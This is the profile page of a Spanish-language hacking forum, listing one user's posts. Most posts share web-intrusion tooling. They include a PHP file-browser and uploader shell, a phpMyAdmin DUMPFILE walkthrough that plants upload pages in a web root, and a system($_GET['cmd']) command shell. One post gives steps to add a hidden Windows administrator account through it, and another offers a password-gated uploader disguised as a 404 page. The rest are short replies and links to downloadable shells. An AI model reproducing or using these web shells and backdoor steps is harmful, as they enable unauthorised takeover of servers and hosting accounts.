Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.


Mensajes - Decode

Páginas: [1] 2
1
Back-end / Re:[PHP] DH Defacer Tools 0.8
« en: Septiembre 30, 2015, 07:27:36 pm »
Buen trabajo.

Saludos.

2
Dudas y pedidos generales / Re:Ayuda y Pedido con Ocultamiento IP
« en: Septiembre 27, 2015, 02:27:28 pm »
Si tu lo dices por el lado de ocultar ip por navegadores, usando un proxy o vpn sería factible pero no es seguro.

Saludos.

3
Seguridad web y en servidores / Re:Backdooring con PHP.
« en: Septiembre 14, 2015, 06:03:18 pm »
El típico método, buen aporte.

Saludos.

4
Shells / Re:[PHP] m31 shell [v0.1.2a]
« en: Septiembre 14, 2015, 05:41:22 pm »
Una consulta ya que estaba viendo esta shell.. hay un personaje llamado ''Veneno'' que ''remakeo'' una shell de q3rv0 y se parece mucho a esta no se si es coincidencia o cosa mía:


Saludos.

Pues decode yo pienso que este tío ha copiado el "remakeo" de Veneno, solamente cambio algunas cosas como el fondo y poco más, al menos que le de créditos a Veneno y a q3rv0.... después todos nos quejamos de Veneno.

Que estas diciendo Zanut? te invito a re-leer el tema junto con el nombre del AUTOR y la FECHA de publicación, no ganas nada defendiendo a veneno si ya todos saben la persona que es, el que esta quedando mal eres tu porque dices cosas incoherentes, como va aex12 a plagiarle el supuesto ''remakeo'' de la shell a veneno? si el ''remakeo'' de la shell de aex12 que hizo veneno fue en 2015 y el la ha publicado en 2013, porfavor fíjate en las fechas antes de comentar.

Saludos.

5
Hacking / Uploader
« en: Septiembre 10, 2015, 05:10:21 pm »
Hola gente, aquí les traigo un uploader que muestra los archivos de la web + los directorios que compone:

Código: [Seleccionar]
<html><head><title>Upload File</title>

<style>

body{background-color:#000; color:#FFF;}

a{color: #999; text-decoration:none;}

a:hover{text-decoration:underline;}

input,textarea,select{ color:#fff;background-color:#000;border:0;}

</style>
<?php

echo "

<script>

var d = document;

function g(c) {

d.mf.c.value=c;

d.mf.submit();

}

</script>

</head><body>"
;

echo 
PHP_OS;

if(
strtoupper(substr(PHP_OS03) ) == "WIN")

$os 'win';

else

$os 'nix';



$home_cwd = @getcwd();

if(isset(
$_POST['c']))

@chdir($_POST['c']);

$cwd = @getcwd();

if(
$os == 'win') {

$home_cwd str_replace("\\""/"$home_cwd);

$cwd str_replace("\\""/"$cwd);

echo "<!-- <td><nobr>Windows --!>";

echo "<!-- g('FilesMan','c:/') --!>";

}



$safe_mode = @ini_get('safe_mode');

if(!$safe_mode) {

echo "<!-- Safe mode:</span> <font color=#00bb00><b>OFF</b></font> --!>\n";

echo "<!-- Safe mode:</span> <font color=green><b>OFF</b></font> --!>\n";

}





if(
$cwd[strlen($cwd)-1] != '/')

$cwd .= '/';



echo 
"Path: ".htmlspecialchars($cwd)."<input type=hidden name=c value='".htmlspecialchars($cwd) ."'><hr>";

if (!
is_writable($cwd)) {

echo "<font color=red>(Not writable)</font><br>";

}

if(
$_POST['p1'] === 'uploadFile') {

if([email protected]move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name']))

echo "Can't upload!<br />";

}



$ls wscandir($cwd);

echo 
"<form method=post name=mf style='display:none;'><input type=hidden name=c></form>";

foreach (
$ls as $f) {

if (is_dir($f)) {

echo "<a href=# onclick='g(\"".$cwd.$f."\");'>".$f."</a>";

if (is_writable($cwd.$f)) {

echo "<!-- 'filename.php','chmod')\"><font color=green> --!> ";

} else {

echo "<!-- 'filename.php','chmod')\"><font color=white> --!> ";

}

echo "<br />";

} else {

$files[] = $f;

}

}

foreach (
$files as $file) {

echo $file."<br />";

}

echo "<hr><form method='post' ENCTYPE='multipart/form-data'>

<input type=hidden name=c value='" 
$cwd ."'>

<input type=hidden name=p1 value='uploadFile'>

Upload File: <input type=file name=f><input type=submit value='>>'></form>"
;



function 
wscandir($cwdir) {

if(function_exists("scandir")) {

return scandir($cwdir);

} else {

$cwdh  opendir($cwdir);

while (false !== ($filename readdir($cwdh)))

$files[] = $filename;

return $files;

}

}

echo 
"</body></html>";

Saludos.

6
Back-end / 404 Not Found
« en: Septiembre 10, 2015, 04:13:38 pm »
Hola gente, aquí les traigo un simple index 404 not found ya que la mayoría de la gente usa otros hosting que no tienen esta index como defecto de errores bueno aquí el código para que la puedan usar en sus websites:

Código: [Seleccionar]
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <?php echo $_SERVER['REQUEST_URI']; ?>  was not found on this server.</p>
<p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>

Para poner esta index como defecto de errores en su web deben poner este código en el archivo de la web .htaccess:

Código: [Seleccionar]
ErrorDocument 404 /nombredelarchivo.php
Saludos.

7
Back-end / Re:[Tool] Is Online v3.0 (By 2Fac3R)
« en: Septiembre 01, 2015, 09:13:21 pm »
Excelente script, pero deberías mejorar algunas cosas como las font y los colores y también el nombre porque ''Is Online?'' = Es Online? debería ser: This Online? así se vería mejor ;)

Saludos.

8
Perl / Sin asunto
« en: Agosto 28, 2015, 07:39:31 pm »
Delete

9
Ingeniería Inversa / Sin asunto
« en: Agosto 23, 2015, 06:24:57 pm »
Delete

10
Shells / Re:[PHP] m31 shell [v0.1.2a]
« en: Agosto 18, 2015, 06:42:11 pm »
Una consulta ya que estaba viendo esta shell.. hay un personaje llamado ''Veneno'' que ''remakeo'' una shell de q3rv0 y se parece mucho a esta no se si es coincidencia o cosa mía:


Saludos.

11
Back-end / Ver ip real estando a través de un proxy o vpn
« en: Agosto 08, 2015, 06:44:03 pm »
Hola gente, aquí les traigo una herramienta que saca la verdadera ip aún estando navegando por un proxy o vpn:

Download: https://github.com/diafygi/webrtc-ips

Saludos.

12
Shells / Eagle Shell
« en: Agosto 02, 2015, 03:37:07 pm »
Hola gente, aquí les presento Eagle Shell, basada en 1n73ction v3:





Download
Password: eagle

Saludos.

13
Seguridad web y en servidores / Re:[Python][PHP] Shell Finder
« en: Julio 10, 2015, 01:35:36 pm »
No has probado hacer un shell finder en php? sería muy bueno..

Saludos.

14
Pentesting / Subir shell desde phpmyadmin (xampp)
« en: Julio 09, 2015, 03:29:07 pm »
Hola gente, aquí les vengo a enseñar como subir una shell desde phpmyadmin:

1- Lo primero que debemos hacer es tener acceso al phpmyadmin.
2- Luego crear una base de datos dentro del phpmyadmin con el nombre que quieran.
3- Luego de que la base de datos este creada nos vamos a SQL y empezamos a poner los siguientes códigos:

El primero es este:

Código: [Seleccionar]
CREATE TABLE `NOMBRE DE LA DB`.`userform` (
`track1` VARCHAR( 1000 ) NOT NULL
) ENGINE = MYISAM ;

Luego de haber hecho esto debemos dar a continuar y poner un nuevo código, que es este:

Código: [Seleccionar]
CREATE TABLE `NOMBRE DE LA DB`.`user_upload` (
`track2` VARCHAR( 1000 ) NOT NULL
) ENGINE = MYISAM ;

Luego de haber hecho este segundo paso insertamos el nuevo código con los mismos pasos anteriores, que es este:

Código: [Seleccionar]
insert into userform values ('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"

"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Upload</title>
</head>
<body bgcolor="black">
<div style=" color:white;text-align:center; margin-top:60px; font-size:25px;
">Upload</div>
<div style="padding-top:75px;margin-left:450px;width:340px; height:70px;">
<form enctype="multipart/form-data" action="upload.php" method="post">
<input name="userfile" type="file" />&nbsp;
<input type="submit" value="Upload" />
</form>
</div>
</body>
</html>');

Luego de haber insertado el tercer código nos vamos a lo siguiente:
 
Código: [Seleccionar]
select * into dumpfile 'C:/xampp/htdocs/form.php' from userform
Luego de haber hecho este paso insertaremos el siguiente código con los mismos pasos anteriores:

Código: [Seleccionar]
INSERT INTO user_upload
VALUES (
"<?php $uploaddir 'C:/xampp/htdocs/'$uploadfile $uploaddir basename($_FILES['userfile']['name']); if 

(
move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)) { print '<body bgcolor=black></br></br><div 

align=center><font size=5 color=white>File uploaded successfully</font></body>'
; } else { print '<body 

bgcolor=black></br></br><div align=center><font size=5 color=red>Error when uploading the file</font></body>'
; } ?>
"
)

Ya hecho este penúltimo paso nos vamos al último código que nos dará el privilegio de subir la shell al directorio principal del servidor:
 
Código: [Seleccionar]
select * into dumpfile 'C:/xampp/htdocs/upload.php' from user_upload
Ya terminado todos estos pasos tendremos el privilegio de subir shell al directorio principal y tener acceso al servidor o host. Para dirigirnos al upload debemos ir a http://website.com/form.php y así podremos subir la shell.

Saludos.

15
Seguridad web y en servidores / Re:Diferencias entre DoS y DDoS
« en: Julio 09, 2015, 03:09:01 pm »
Bien explicado.

Saludos.

16
Bugs y Exploits / Re:Inyeccion SSI (Server Side Includes)
« en: Julio 01, 2015, 06:31:47 pm »
Buen trabajo.

Saludos.

17
Pentesting / Elevar privilegios en servidores windows
« en: Noviembre 23, 2014, 06:46:36 pm »
Hola gente, aquí les vengo a enseñar como elevar privilegios en servidores windows.

1- Bueno primero necesitan tener subida una shell a una web o host.
2- Después tener un archivo shell server windows subido en la web o host.

El código que insertaremos es este:

Código: PHP
  1. <?php system($_GET['cmd']); ?>

Ya con el archivo subido van al link website.com/archivo.php?cmd=whoami y les tiene que aparecer NT
AUTORITHY/SYSTEM si no les sale nada o les sale NT es porque no tiene servidor vps la web o host.

Ya realizado lo anterior ahora ponemos: website.com/archivo.php?cmd=net user para ver los usuarios que tiene el servidor VPS.

Ya que hecho esto, ponemos: website.com/archivo.php?cmd=net user (NOMBRE DEL USUARIO QUE VAN A CREAR) (CONTRASEÑA QUE VAN A PONERLE) /add esto es para crear el usuario, sin los paréntesis.

Bueno ya hecho esto nos aparecerá (THE COMMAND COMPLETED SUCCESSFULLY) y hacemos lo siguiente: website.com/archivo.php?cmd=net user para ver nuestro usuario añadido si no sale es que hicieron algo mal.

Ahora hacemos esto: website.com/archivo.php?cmd=net localgroup Administrators (NOMBRE DEL USUARIO QUE HAN CREADO) /add y tiene que salir (THE COMMAND COMPLETED SUCCESSFULLY) esto es para darnos privilegios de Administrador en el servidor vps, sin los paréntesis.

Ahora para saber la IP del servidor VPS ponemos: website.com.com/archivo.php?cmd=ipconfig

Ya hecho todos estos pasos, podremos acceder al servidor vps como un Administrador.

Saludos.

18
Back-end / Sin asunto
« en: Octubre 17, 2014, 10:52:47 pm »
Delete

19
Python / Sin asunto
« en: Octubre 17, 2014, 10:40:12 pm »
Delete

20
Back-end / Uploader oculto
« en: Agosto 26, 2014, 09:39:18 pm »
Hola gente,aquí les dejo un uploader oculto:

Código: PHP
  1. <title>404 Not Found</title>
  2. <h1>Not Found</h1>
  3. <p>The requested URL was not found on this server.</p>
  4. <hr>
  5. <address>Apache Server at <?php echo $_SERVER['SERVER_NAME']; ?> Port 80</address>
  6.     <style>
  7.         input { margin:0;background-color:#fff;border:1px solid #fff; }
  8.     </style>
  9.     <center>
  10.     <form method="post"><p>
  11. <center><input type="password" name="pw" size="25" value=""></center>
  12. </form></p></center>
  13. <?php
  14. if(empty($_POST["pw"])==0){if(md5($_POST["pw"])=="76ee3de97a1b8b903319b7c013d8c877"){if(empty($_FILES["A"])==0){
  15. if(move_uploaded_file($_FILES['A']['tmp_name'],$_SERVER["DOCUMENT_ROOT"].'/'.$_FILES['A']['name'])==1){echo "<center>Archivo subido!</center>";}
  16. }else{echo '<form enctype="multipart/form-data" action="'.$_SERVER["REQUEST_URI"].'" method="POST"><center><input name="A" type="file"><input type="submit" value="Subir"></center></form>';}exit();}}
  17. ?>

Password: upload

Saludos.

Páginas: [1] 2